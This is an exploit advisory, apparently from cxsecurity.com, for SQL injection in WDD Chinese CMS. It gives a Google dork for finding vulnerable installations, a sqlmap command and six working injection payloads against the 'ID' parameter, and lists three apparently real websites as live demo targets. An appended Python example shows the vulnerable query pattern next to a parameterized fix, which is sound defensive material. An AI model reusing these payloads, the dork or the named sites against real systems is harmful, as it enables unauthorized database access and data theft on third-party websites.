WDD CHINESE CMS SQL injection

2019.07.03
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: WDD CHINESE CMS SQL injection
# Date: 2019-07-3
# Google Dork : intext:"DESIGNED BY WDD" inurl:ID=
# Exploit Author: S I R M A X
# Vendor Homepage: http://www.wddgroup.com
# Version: All Version
# Tested on: win,linux
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#

[SQL injection]

[+] Method ( Sql injection )
Storm Security Team of IRAN

[+] parameter : ID == php?ID=

=================================================================================

[+] Sqlmap:
[-] sqlmap -u "http://victim.com/product.php?KindID=1&ID=" -p ID --dbs

[#] Testing Method:
[+] - boolean-based blind
[+] - time-based blind
[+] - error-based
[+] - UNION query
[+] - inline query
[+] - stacked queries

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
||||||||||||||||||||||| Parameter: ID (GET) |||||||||||||||||||||||

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: KindID=1&ID=6 AND 9460=9460
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: KindID=1&ID=6 AND SLEEP(5)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: KindID=1&ID=-9428 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(105)+CHAR(120)+CHAR(107)+CHAR(119)+CHAR(73)+CHAR(76)+CHAR(72)+CHAR(72)+CHAR(101)+CHAR(114)+CHAR(119)+CHAR(121)+CHAR(72)+CHAR(77)+CHAR(118)+CHAR(112)+CHAR(83)+CHAR(111)+CHAR(81)+CHAR(84)+CHAR(67)+CHAR(110)+CHAR(72)+CHAR(82)+CHAR(75)+CHAR(102)+CHAR(78)+CHAR(84)+CHAR(100)+CHAR(101)+CHAR(78)+CHAR(75)+CHAR(109)+CHAR(99)+CHAR(112)+CHAR(82)+CHAR(80)+CHAR(90)+CHAR(87)+CHAR(107)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aXFY
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: KindID=1&ID=6 AND (SELECT 2082 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(2082=2082,1))),0x716a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: KindID=1&ID=(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9401=9401) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113))
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: KindID=1&ID=138;WAITFOR DELAY '0:0:5'--
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

=================================================================================

Demo:
[+] https://www.crmto.com/news.php?KindID=1&ID=6[SQL]
[+] http://www.catchertw.com.tw/company_news_more.aspx?KindID=1&ID=138[SQL]
[+] http://www.navjack.com/product.php?KindID=36&ID=127[SQL]

=================================================================================

[=] T.me/Sir_Max
[=] Telegram Channel ==> @Storm_Security

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
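The root cause behind every payload type listed above is the same: the ID query-string value is concatenated into the SQL statement as text, so the boolean probe `6 AND 9460=9460` is parsed as SQL instead of being compared against a number. The following Python/sqlite3 example is added here for illustration and is not code from the advisory, the vendor, or the CMS; the `product` table, its columns and rows are constructed, and the two lookup functions are hypothetical stand-ins for the page's `product.php` handler. It shows the vulnerable concatenation pattern beside the hardened form (type check plus bound parameter) and demonstrates that the advisory's boolean-based probe changes the result only for the vulnerable version.

```python
import sqlite3

# Constructed sample table standing in for the CMS product table (not the vendor's schema).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (ID INTEGER, KindID INTEGER, Name TEXT)")
    conn.executemany(
        "INSERT INTO product VALUES (?, ?, ?)",
        [(6, 1, "Widget"), (7, 1, "Gadget"), (127, 36, "Doohickey")],
    )
    return conn

def lookup_vulnerable(conn, kind_id, product_id):
    # Hypothetical vulnerable handler: raw query-string values are pasted into the SQL,
    # so "6 AND 9460=9460" becomes part of the WHERE clause.
    sql = f"SELECT Name FROM product WHERE KindID={kind_id} AND ID={product_id}"
    return [row[0] for row in conn.execute(sql)]

def lookup_hardened(conn, kind_id, product_id):
    # Hardened handler: reject anything that is not an integer, then bind the values
    # as parameters so the database never parses user input as SQL.
    try:
        kind_id = int(kind_id)
        product_id = int(product_id)
    except (TypeError, ValueError):
        return []  # a real handler would answer HTTP 400 here
    rows = conn.execute(
        "SELECT Name FROM product WHERE KindID=? AND ID=?", (kind_id, product_id)
    )
    return [row[0] for row in rows]

def demo():
    """Run the advisory's boolean-based probe against both handlers."""
    conn = build_db()
    true_probe = "6 AND 9460=9460"   # probe from the sqlmap output above (always true)
    false_probe = "6 AND 9460=9461"  # its always-false counterpart
    return {
        # Vulnerable: the result flips with the probe's truth value, which is
        # exactly the oracle a boolean-based blind injection relies on.
        "vuln_true": lookup_vulnerable(conn, "1", true_probe),
        "vuln_false": lookup_vulnerable(conn, "1", false_probe),
        # Hardened: both probes are rejected, and a plain ID still works.
        "hard_true": lookup_hardened(conn, "1", true_probe),
        "hard_false": lookup_hardened(conn, "1", false_probe),
        "hard_plain": lookup_hardened(conn, "1", "6"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Parameter binding alone would already stop the injection; the explicit `int()` check is added because the advisory's parameters are numeric identifiers, and rejecting non-numeric input early also makes these probes easy to spot in application logs as a stream of 400 responses on `ID=`.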


Copyright 2024, cxsecurity.com